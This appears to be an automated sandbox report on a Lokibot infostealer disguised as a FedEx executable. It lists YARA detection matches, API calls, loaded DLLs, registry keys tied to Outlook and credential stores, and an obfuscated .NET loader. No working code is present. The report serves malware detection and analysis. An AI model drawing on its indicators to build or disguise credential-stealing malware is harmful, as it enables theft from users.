Source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: FedEx_776282383902.exe PID: 6192, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: FedEx_776282383902.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.FedEx_776282383902.exe.30b6ed4.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FedEx_776282383902.exe.30a6ebc.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FedEx_776282383902.exe.311bddc.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FedEx_776282383902.exe.5a40000.9.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@0/1

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

3_2_0040650A

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

3_2_0040434D

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx_776282383902.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Mutant created: NULL

Source: FedEx_776282383902.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FedEx_776282383902.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FedEx_776282383902.exe

ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\FedEx_776282383902.exe "C:\Users\user\Desktop\FedEx_776282383902.exe"
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process created: C:\Users\user\Desktop\FedEx_776282383902.exe "C:\Users\user\Desktop\FedEx_776282383902.exe"
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process created: C:\Users\user\Desktop\FedEx_776282383902.exe "C:\Users\user\Desktop\FedEx_776282383902.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: FedEx_776282383902.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FedEx_776282383902.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.FedEx_776282383902.exe.7d90000.11.raw.unpack, LoginForm.cs

.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FedEx_776282383902.exe.42bab30.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FedEx_776282383902.exe.42a0b10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FedEx_776282383902.exe PID: 6192, type: MEMORYSTR

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 0_2_012CF478 push esp; iretd	0_2_012CF479
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AD4
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AFC

Source: FedEx_776282383902.exe

Static PE information: section name: .text entropy: 7.9734414761650525

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
